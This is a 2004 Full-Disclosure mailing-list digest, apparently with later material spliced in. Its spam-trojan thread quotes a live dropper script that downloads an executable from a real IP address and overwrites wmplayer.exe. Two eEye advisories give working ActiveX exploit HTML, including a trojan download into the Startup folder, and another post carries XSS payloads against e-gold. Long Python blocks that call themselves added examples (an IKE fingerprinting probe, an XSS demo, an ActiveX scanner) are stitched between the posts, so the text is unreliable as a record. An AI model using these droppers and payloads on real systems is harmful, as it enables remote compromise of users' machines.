Looks like june4.exe is some kind of spyware.  It references another
site, cjdra.com, possibly uploading user information there.

I just started learning assembly, please pardon my lack of knowledge on
reverse engineering.

J
Michael Gargiullo wrote:
On Wed, 2004-06-16 at 13:41, joe smith wrote:
 

The file is UPX packed and within the file there is another GET 
pointing to "http://219.234.95.124/june4.exe"

J
   

Like those Chinese stacking dolls...  How'd you unpack it? 

 

Michael Gargiullo wrote:
   

On Wed, 2004-06-16 at 08:23, Geo. wrote:
 

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
   

 

  function InjectedDuringRedirection(){
showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
  

   

Here's the contents:
var x = new ActiveXObject(Microsoft.XMLHTTP); 
x.Open(GET, http://219.234.95.124/vbox/w_e_d.exe,0);
x.Send(); 

var s = new ActiveXObject(ADODB.Stream);
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(C:\\Program Files\\Windows Media Player\\wmplayer.exe,2);
location.href = mms://;
so whatever w_e_d.exe is...

 


 



[Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

2004-06-16 Thread Bob Walton
You all might want to take a look at America's best kept secret, security for
wireless internet (we have been doing it for 5 years). We would truly value your
opinion. Bob Walton 877-326-5990 [EMAIL PROTECTED]

-Original Message-
From: Thierry Carrez [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 15, 2004 3:14 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Gallery: Privilege escalation vulnerability
  Date: June 15, 2004
  Bugs: #52798
ID: 200406-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery.

Background
==

Gallery is a web application written in PHP which is used to organize
and publish photo albums. It allows multiple users to build and
maintain their own albums. It also supports the mirroring of images on
other servers.

Affected packages
=

-------------------------------------------------------------------
 Package               /   Vulnerable   /          Unaffected
-------------------------------------------------------------------
  1  app-misc/gallery       <= 1.4.3_p1               >= 1.4.3_p2

Description
===

There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery. A
Gallery administrator has full access to all albums and photos on the
server, thus attackers may add or delete photos at will.

Impact
==

Attackers may gain full access to all Gallery albums. There is no risk
to the webserver itself, or the server on which it runs.

Workaround
==

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==

All users should upgrade to the latest available version of Gallery.

# emerge sync

# emerge -pv ">=app-misc/gallery-1.4.3_p2"
# emerge ">=app-misc/gallery-1.4.3_p2"

References
==

  [ 1 ] Gallery Announcement

http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=123&mode=thread&order=0&thold=0

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200406-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAz0qMvcL1obalX08RAmuoAKCKcyWXNtt+mdgtX26R9l96V8yE4QCfVFQG
9s9GiyiY83X/VHcx2Kc+mQQ=
=+z9+
-END PGP SIGNATURE-




[Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage

2004-06-16 Thread Roy Hills
Checkpoint Firewall-1 IKE Vendor ID information leakage
Introduction:
Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
return an IKE Vendor ID payload when it receives an IKE packet with
a specific Vendor ID payload.  The Vendor ID payload that is returned
identifies the system as Checkpoint Firewall-1 and also determines the
Firewall-1 version and service-pack or feature-pack revision number.
This is an information leakage issue which can be used to fingerprint
the Firewall-1 system.
This information leakage issue has been verified for Checkpoint Firewall-1
versions from 4.1 (no service pack) to NG AI R55 inclusive.  Firewall-1
version 4.0 is not vulnerable because it does not return any Vendor ID
payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
because they do not support IPsec VPN.  However, most people are running
either NG or 4.1 and therefore this issue will apply to most Firewall-1
installations that have IPsec VPN enabled.
I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
and demonstrate this issue.
Full details are available at:
http://www.nta-monitor.com/news/checkpoint2004/index.htm
Details:
If an IKE Phase-1 packet with a Vendor ID payload containing the data
f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data
encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
or higher which supports IKE, the Firewall will respond with a Vendor ID
payload containing data which identifies it as a Checkpoint Firewall-1
system, provides details about the version of the Firewall software,
and contains some additional information.
The data that is returned in the Vendor ID payload from the
Firewall consists of the same 20-byte sequence that was sent
(f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
of data that contains the encoded version number and some other details
that appear to contain details of the Firewall's capabilities.
I presume that the 20-byte magic string is an SHA1 hash of something.
I'd be interested to find out what source string hashes to this value.
Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
NG AI R55 (latest current version), I have found the following returned
Vendor ID payloads.  In the payloads below, a dot (.) represents an
arbitrary hex digit:
Firewall-1 4.1 Base (no service pack)
f4ed19e0c114eb516faaac0ee37daf2807b4381f00010002
Firewall-1 4.1 SP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00010003
Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
f4ed19e0c114eb516faaac0ee37daf2807b4381f00010fa2
[Note to moderator: I notified Checkpoint of this issue on 13th April
2004, but have not received any response apart from a "We've received
your Email" auto-reply.]
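The exchange described in the post, as an added example that is not part of the original post and is not ike-scan's code: it builds the IKE Phase-1 probe (ISAKMP header, a minimal SA payload, and a Vendor ID payload carrying the 20-byte string quoted above) and walks the payload chain of a reply to pull out Vendor ID payloads, flagging one that starts with the Check Point magic string. Payload layouts follow RFC 2408; the transform proposed in the SA payload (3DES/SHA1/pre-shared key/MODP-1024) is an assumption, since any well-formed SA is enough to carry the probe. The "response" below is constructed here for demonstration and is not a captured Firewall-1 reply, and the 20 bytes after the magic string are left undecoded because the post does not document their layout.

```python
import os
import struct

# ISAKMP constants (RFC 2408)
NP_NONE, NP_SA, NP_VID = 0, 1, 13
ISAKMP_VERSION = 0x10        # major 1, minor 0
EXCH_MAIN_MODE = 2           # Identity Protection exchange
HDR_LEN = 28

# The 20-byte Vendor ID string quoted in the post.
CHECKPOINT_VID = bytes.fromhex("f4ed19e0c114eb516faaac0ee37daf2807b4381f")


def payload(next_payload, body):
    """Generic payload header (next payload, reserved, total length) + body."""
    return struct.pack("!BBH", next_payload, 0, 4 + len(body)) + body


def sa_payload(next_payload):
    """Minimal Main Mode SA: one proposal, one transform.
    The transform attributes (3DES-CBC, SHA1, PSK, MODP-1024) are an
    assumption; only a syntactically valid SA is needed to carry the VID."""
    attrs = b"".join(struct.pack("!HH", 0x8000 | t, v)
                     for t, v in ((1, 5), (2, 2), (3, 1), (4, 2)))
    transform = struct.pack("!BBHBBH", NP_NONE, 0, 8 + len(attrs), 1, 1, 0) + attrs
    proposal = struct.pack("!BBHBBBB", NP_NONE, 0, 8 + len(transform),
                           1, 1, 0, 1) + transform
    return payload(next_payload, struct.pack("!II", 1, 1) + proposal)  # DOI=IPsec, SIT_IDENTITY_ONLY


def isakmp_message(first_np, body, icookie=None, rcookie=bytes(8)):
    """Wrap a payload chain in a 28-byte ISAKMP header."""
    if icookie is None:
        icookie = os.urandom(8)
    hdr = struct.pack("!8s8sBBBBII", icookie, rcookie, first_np, ISAKMP_VERSION,
                      EXCH_MAIN_MODE, 0, 0, HDR_LEN + len(body))
    return hdr + body


def build_probe():
    """The Phase-1 packet from the post: SA payload followed by the Check Point VID."""
    return isakmp_message(NP_SA, sa_payload(NP_VID) + payload(NP_NONE, CHECKPOINT_VID))


def vendor_ids(msg):
    """Walk the payload chain and return every Vendor ID body.
    Truncated, zero-length or over-long payloads end the walk instead of looping."""
    if len(msg) < HDR_LEN:
        return []
    np, total = msg[16], struct.unpack("!I", msg[24:28])[0]
    vids, off = [], HDR_LEN
    while np != NP_NONE and off + 4 <= min(total, len(msg)):
        nxt, _, plen = struct.unpack("!BBH", msg[off:off + 4])
        if plen < 4 or off + plen > len(msg):
            break
        if np == NP_VID:
            vids.append(msg[off + 4:off + plen])
        np, off = nxt, off + plen
    return vids


def checkpoint_fingerprint(msg):
    """Hex of the bytes following the Check Point magic string in a VID, or None.
    A VID that is only the magic string (e.g. our own probe) does not count."""
    for vid in vendor_ids(msg):
        if len(vid) > len(CHECKPOINT_VID) and vid.startswith(CHECKPOINT_VID):
            return vid[len(CHECKPOINT_VID):].hex()
    return None


# Constructed demo reply: magic string + 20 placeholder bytes. NOT a real capture.
SAMPLE_SUFFIX = bytes(range(20))
SAMPLE_RESPONSE = isakmp_message(NP_VID, payload(NP_NONE, CHECKPOINT_VID + SAMPLE_SUFFIX),
                                 icookie=bytes(8), rcookie=b"\x01" * 8)
# Constructed malformed reply: a payload claiming length 0 must not hang the parser.
MALFORMED_RESPONSE = isakmp_message(NP_VID, struct.pack("!BBH", NP_VID, 0, 0) + b"\x00" * 4)

if __name__ == "__main__":
    print("probe:", build_probe().hex())
    print("fingerprint suffix:", checkpoint_fingerprint(SAMPLE_RESPONSE))
```

Against a live system you would send build_probe() to UDP/500 and hand the datagram that comes back to checkpoint_fingerprint(); only do that on systems you are authorised to test. As the follow-up in this thread notes, answering a recognised Vendor ID is documented ISAKMP behaviour, so the practical check on the defensive side is whether your IKE listener is reachable from networks that have no business negotiating with it.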

[Full-Disclosure] IBM Access Support (eGatherer) Activex Dangerous Methods Vulnerability

2004-06-16 Thread Drew Copley
IBM Access Support (eGatherer) Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):
116   

Severity:
High (Remote Code Execution)

Vendor:
IBM

Systems Affected:
IBM Access Support (eGatherer) Activex Version 2.0.0.16

Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed eGatherer activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. This is installed by default
on many popular IBM PC models.

The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on an user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.

In this case, IBM made available methods such as GetMake,
GetModel, GetOSName, SetDebugging (accepting a variable called
filename) and RunEgatherer (also accepting a suspicious parameter).
These dangerous methods were found to be able to write a trojan file to
the user's startup folder through a difficult trick. 

It should be further noted that both the SetDebugging and RunEgatherer
methods allow a web page author to write files of their choice (though
the content is limited) to the victim's hard drive -- anywhere on their
hard drive. These are the default and clearly stated usage of these
methods.

Technical Details:
For clarification purposes this will be presented as a two page attack,
though it may easily be a single HTML page attack.


---EXAMPLE HTML 1 -
//first this page would be viewed, then through refreshing or whatever
//one goes to the second page (or just timing the two calls with
//setTimeout and putting them on the same page...)
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>

<script>
X.SetDebugging("/../xx.hta",-1);
</script>
-

---EXAMPLE HTML 2 -
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>

<script>
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
</script>


-

In the above example, we see the object called utilizing the object
tag. The codebase tag [not shown here] is used by the browser to
initiate the install of the activex if it is not already existing on the
system. This would bring up the activex prompt which essentially asks
the user if they trust IBM. Finally, the object is named "X", so we
might reference it later in script and use its dangerous methods.

In the first page we call the SetDebugging method. SetDebugging
writes a file called xx.hta to the C:\ drive. (An attacker would
probably write the file to the StartUP folder in real life.) This file
will have xx.hta written inside of it, along with some other stuff.

We need to control what is written inside the file so we can write
dangerous scripting. But, all we can write is what can be in a filename.

Now, the second HTML page is called. What happens? The application
throws an error, but before it crashes, it writes our exploit code to
the file xx.hta. (It crashes because < and > are not valid characters for
a filename).

So, now we have the exploit file in the exploit location with the
exploit location within it... and the target system is taken down.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860

Credit:
Discovery: Drew Copley
Additional Research: [EMAIL PROTECTED]

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html

Another Quote of the Day:
A man's greatest work is to break his enemies, to drive them before
him, to take from them all the things that have been theirs, to hear the
weeping of those who cherished them. - Genghis Khan

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall 

Re: [Full-Disclosure] Akamai

2004-06-16 Thread Peter van den Heuvel
Paul Schmehl wrote:
If networks simply took responsibility for the traffic that comes from 
them, this problem wouldn't exist.
Indeed. DNS's, AS's and what not else is required to make the internet 
tick; all is centrally controlled and delegated. What's missing is a 
flanking reverse of responsibilities. It's idiotic that providers or even 
full countries can completely ignore / reject any complaint without 
having their AS or DNS taken down.

Unless networks begin doing this routinely (including ISPs), legislation 
will be introduced to solve the problem, and then we will all be much 
worse off.  There's nothing like a law to completely screw things up.
Amen!
Peter
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: MAGIC XSS INTO THE DNS: coelacanth

2004-06-16 Thread Drew Copley
 

 -Original Message-
 From: Windows NTBugtraq Mailing List 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 [EMAIL PROTECTED]
 Sent: Tuesday, June 15, 2004 3:00 PM
 To: [EMAIL PROTECTED]
 Subject: MAGIC XSS INTO THE DNS: coelacanth
 
 Tuesday, June 15, 2004
 
 The following courtesy of 'bitlance winter' adds an entirely new
 dimension to the matter and also suggest some additional
 peculiarities at play:
 
 <a href='http://"><plaintext>.e-gold.com'>foo</a>
 
 <a href='http://"><script>alert()<%2Fscript>.e-gold.com'>foo</a>
 
 these will inject arbitrary html and script into the site in the
 context of the 'intranet zone', which means one no longer needs
 to go out and setup a site with the dns issue, all one needs to
 do is locate a functioning site, include their code into a
 suitable url, either direct the target via that or place an
 iframe elsewhere pointing to it.

Because the wildcarding is a bit too wild.

For instance, http://money.e-gold.com/  resolves.

And, http://money;G-MoneyOGbabyOG.e-gold.com/; resolves.

In e-gold's case, they actually take the url line and render
it variously in their dynamic html on their page.



 
 Still unclear how or why this can be interpreted into the site
 or through the browser.
 
 credit: 'bitlance winter'
 
 
 End Call
 
 --
 http://www.malware.com
 
 -
 NTBugtraq Editor's Note:
 
 Want to reply to the person who sent this message? This list 
 is configured such that just hitting reply is going to result 
 in the message coming to the list, not to the individual who 
 sent the message. This was done to help reduce the number of 
 Out of Office messages posters received. So if you want to 
 send a reply just to the poster, you'll have to copy their 
 email address out of the message and place it in your TO: field.
 -
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
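The failure mode in this thread is a wildcard DNS record that makes any name under the zone resolve, combined with a page that writes the requested host name back into its HTML. The following is an added example, not code from e-gold or from anyone in the thread: it shows the reflecting pattern beside a hardened version that only accepts syntactically valid host names under the expected zone and HTML-escapes what it reflects. The page shape and the zone check are assumptions for illustration; the host names are constructed from the ones quoted above.

```python
import html
import re

# RFC 1123 label syntax: letters, digits and hyphens, 1-63 chars, no leading
# or trailing hyphen. Labels are lower-cased before the check.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def is_valid_hostname(host):
    """True only for a syntactically valid DNS host name (no port, no path)."""
    host = host.lower().rstrip(".")
    if not host or len(host) > 253:
        return False
    return all(LABEL_RE.match(label) for label in host.split("."))


def reflect_unsafely(host):
    """The pattern the thread describes (hypothetical page): the name the
    client used is written straight into the markup. With a wildcard DNS
    record, any attacker-chosen name resolves, so its markup reaches the page."""
    return "<p>You are connected to " + host + "</p>"


def reflect_safely(host, zone="e-gold.com"):
    """Hardened form: reject anything that is not a valid host under the
    expected zone, then HTML-escape the value that is reflected."""
    host = host.lower().rstrip(".")
    if not is_valid_hostname(host):
        raise ValueError("malformed Host header")
    if host != zone and not host.endswith("." + zone):
        raise ValueError("Host outside expected zone")
    return "<p>You are connected to " + html.escape(host) + "</p>"


def rejected(host):
    """Helper for checks: does the hardened handler refuse this Host value?"""
    try:
        reflect_safely(host)
    except ValueError:
        return True
    return False


# Constructed inputs modelled on the names quoted in the thread.
GOOD_HOST = "money.e-gold.com"
XSS_HOST = '"><script>alert()</script>.e-gold.com'
ODD_HOST = "money;G-MoneyOGbabyOG.e-gold.com"

if __name__ == "__main__":
    print(reflect_unsafely(XSS_HOST))   # markup lands in the page
    print(reflect_safely(GOOD_HOST))
    print("rejected:", rejected(XSS_HOST), rejected(ODD_HOST))
```

Note that the DNS side cannot fix this on its own: the wildcard only makes the hostile name routable, and the injection happens where the application trusts the Host header as if it were data it had generated itself.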


[Full-Disclosure] IBM acpRunner Activex Dangerous Methods Vulnerability

2004-06-16 Thread Drew Copley
IBM acpRunner Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):
116   

Severity:
High (Remote Code Execution)

Vendor:
IBM

Systems Affected:
acpRunner Activex Version 1.2.5.0

Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed acpRunner activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. An unknown number of systems
already have this activex on their systems.

The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on an user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.

In this case, IBM made available methods such as DownLoadURL,
SaveFilePath, and Download. Almost needless to say, these methods
allow a remote attacker to have a victim system silently download the
file of their choosing into the location of their choosing. By
downloading an executable file to the Startup folder, this malicious
executable would be automatically executed on start up.

Technical Details:
---EXAMPLE HTML-

<object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIAAAEQIAAA==">
</object>

<script>
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = "96,857";
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
</script>

-

In the above example, we see the object called utilizing the object
tag. The codebase tag is used by the browser to initiate the install of
the activex if it is not already existing on the system. This would
bring up the activex prompt which essentially asks the user if they
trust IBM. Finally, the object is named runner, so we might reference
it later in script and use its dangerous methods.

In the script we see we access the dangerous methods of runner in a
completely straightforward manner. The saveFilePath method uses a
local url on the user's system which will accurately point to the user's
startup folder. Finally, the method Download is called, and a progress
meter shows the trojan file being downloaded to the exploit folder on
the user's system. At restart, the OS would automatically run the
trojan.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860

Credit:
Discovery: [EMAIL PROTECTED]
Additional Research: Drew Copley

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html

Quotes of the Day:
Fuggedboutit - the Cosa Nostra community as reported by Donnie
Brasco (aka, Joe Pistone, FBI)

You know what glamour is? It is fear. - The Krays (1981)

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

  

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
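Both eEye advisories in this digest (the eGatherer one above and this acpRunner one) come down to a signed control being instantiated from a hostile page and driven through a handful of named methods. The following is an added example, not eEye's or IBM's code: a small content check, of the kind a proxy or mail gateway rule would do, that finds `<object>` tags referencing the two CLSIDs quoted in the advisories and reports which of the named methods the page's script calls through the object's id. The sample page is constructed here from the advisories' snippets; the CLSID `00000000-...` stands in for an unrelated, benign control.

```python
import re

# CLSIDs and method names quoted in the two eEye advisories.
IBM_ACTIVEX = {
    "74FFE28D-2378-11D5-990C-006094235084": "IBM Access Support (eGatherer)",
    "E598AC61-4C6F-4F4D-877F-FAC49CA91FA3": "IBM acpRunner",
}
DANGEROUS_METHODS = ("SetDebugging", "RunEgatherer", "DownLoadURL",
                     "SaveFilePath", "DownLoad")
_CANONICAL = {m.lower(): m for m in DANGEROUS_METHODS}

OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I)
# name=value pairs, double-quoted, single-quoted or bare (the advisories use bare ones)
ATTR_RE = re.compile(r"""([A-Za-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def attributes(tag_body):
    """Parse the attributes of one <object ...> tag into a lower-cased dict."""
    attrs = {}
    for m in ATTR_RE.finditer(tag_body):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def normalize_clsid(value):
    """'clsid:{xxxx}' / 'CLSID:xxxx' -> 'XXXX' for table lookup."""
    value = value.strip().lower()
    if value.startswith("clsid:"):
        value = value[len("clsid:"):]
    return value.strip("{}").upper()


def scan_html(page):
    """Report each instantiation of the two IBM controls and which of their
    dangerous methods the page's script touches via the object's id."""
    findings = []
    for m in OBJECT_RE.finditer(page):
        attrs = attributes(m.group(1))
        clsid = normalize_clsid(attrs.get("classid", ""))
        if clsid not in IBM_ACTIVEX:
            continue
        obj_id = attrs.get("id")
        methods = set()
        if obj_id:
            call_re = re.compile(r"\b" + re.escape(obj_id) + r"\s*\.\s*("
                                 + "|".join(DANGEROUS_METHODS) + r")\b", re.I)
            methods = {_CANONICAL[c.group(1).lower()] for c in call_re.finditer(page)}
        findings.append({
            "control": IBM_ACTIVEX[clsid],
            "clsid": clsid,
            "object_id": obj_id,
            "codebase": attrs.get("codebase"),
            "methods": sorted(methods),
        })
    return findings


# Constructed sample page built from the advisories' snippets (not a real capture).
SAMPLE_PAGE = r"""<html><body>
<object width="310" height="20"
  codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab"
  id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"></object>
<object classid=clsid:74FFE28D-2378-11D5-990C-006094235084 id=X></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="benign"></object>
<script>
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.DownLoad();
X.SetDebugging("/../xx.hta", -1);
benign.DownLoad();
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f["control"], f["object_id"], f["methods"])
```

The CLSID match alone is the signal worth acting on: a page that instantiates either control, with or without a `codebase`, has no legitimate reason to be served from anywhere but IBM's support site. The method scan is there to show how far the page goes, and it only sees direct `id.Method` calls; script that reaches the object through `document.all`, `getElementById` or string-built names would need the kill bit (IBM's patch) rather than content inspection.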


Re: [Full-Disclosure] Akamai

2004-06-16 Thread Ron DuFresne

Might as well toss in egress filtering to prevent many of the abuses of
spoofing that happen in the present env of the internet.  The ISP and
others will claim that this is far too costly for their routers to handle,
but, for the vast majority of sites, this is likely to not be as costly as
the network folks are claiming as a way to avoid doing a tad bit more work
in their router configs.  Some of the worst sites for spoofing abuses, and
those that have networkies that will complain the loudest, are the .edu's.

Thanks,

Ron DuFresne

[SNIP]

 
 If networks simply took responsibility for the traffic that comes from
 them, this problem wouldn't exist.  It's completely trivial to find
 infected hosts on a network through passive monitoring.  They should then
 be disconnected until they are properly cleaned and secured.

 Unless networks begin doing this routinely (including ISPs), legislation
 will be introduced to solve the problem, and then we will all be much
 worse off.  There's nothing like a law to completely screw things up.

 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu/ir/security/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


~~
Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation. -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Akamai

2004-06-16 Thread Valdis . Kletnieks
On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel [EMAIL PROTECTED]  said:
 Indeed. DNS's, AS's and what not else is required to make the internet 
 tick; all is centrally controlled and delegated. What's missing is a 
 flanking reverse of resposibilities. It's idiotic that providers or even 
 full countries can completely ignore / reject any complaint without 
 having their AS or DNS taken down.

In other arenas, they call the concept diplomatic immunity



pgpR4PH0XXlZF.pgp
Description: PGP signature


Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread Michael Gargiullo
On Wed, 2004-06-16 at 14:25, joe smith wrote:
 I used PE Explorer. 
 
 Looks the june4.exe is some kind of spyware.  It reference to another 
 site cjdra.com, possibly uploading user information there. 
 
 I just started learning assembly, please pardon my lack of knowledge on 
 reverse engineering.
 
 J

By chance, do you know of a similar tool that runs under linux?



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread joe smith
http://upx.sourceforge.net/#download
Michael Gargiullo wrote:
On Wed, 2004-06-16 at 14:25, joe smith wrote:
 

I used PE Explorer. 

Looks the june4.exe is some kind of spyware.  It reference to another 
site cjdra.com, possibly uploading user information there. 

I just started learning assembly, please pardon my lack of knowledge on 
reverse engineering.

J
   

By chance, do you know of a similar tool that runs under linux?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.

2004-06-16 Thread Hugo Vazquez Carapez
File Source disclosure vulnerability in all web servers.


Infohacking Security Advisory 04.16.04
www.infohacking.com
Jun 16, 2004


I. BACKGROUND

We discovered a very dangerous file source disclosure vulnerability in all
webservers. This issue can be exploited using Microsoft Internet Explorer
and probably other browsers.


II. DESCRIPTION


Remote exploitation of this issue can be achieved by clicking with the
right button on the website and selecting the view source code option.
This option will display the contents of the html code.


For more leet exploitation, it is also possible to use lynx --source 
http://vulnerable.site/file.html


III. ANALYSIS


Successful exploitation allows an attacker to gain very very very sensitive
information of the website.



IV. DETECTION


Infohacking has confirmed that all webservers are vulnerable to this
problem. Sites like microsoft, securityfocus, hack.co.za and others are
vulnerable too!



V. WORKAROUNDS


No work.. indeed.


VI. CVE INFORMATION


This is an 0day bug... so still no bid and CVE.


VII. DISCLOSURE TIMELINE


02/18/04 Hugo notified the bug to [EMAIL PROTECTED]
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com
06/17/04 Public Disclosure


VIII. CREDIT

Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif


Get pwned by script kiddies?
Call us, we can hack you again.


IX. LEGAL NOTICES


Copyright (c) 2004 INFOHACKING, Inc.


Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically, please

email [EMAIL PROTECTED] for permission.


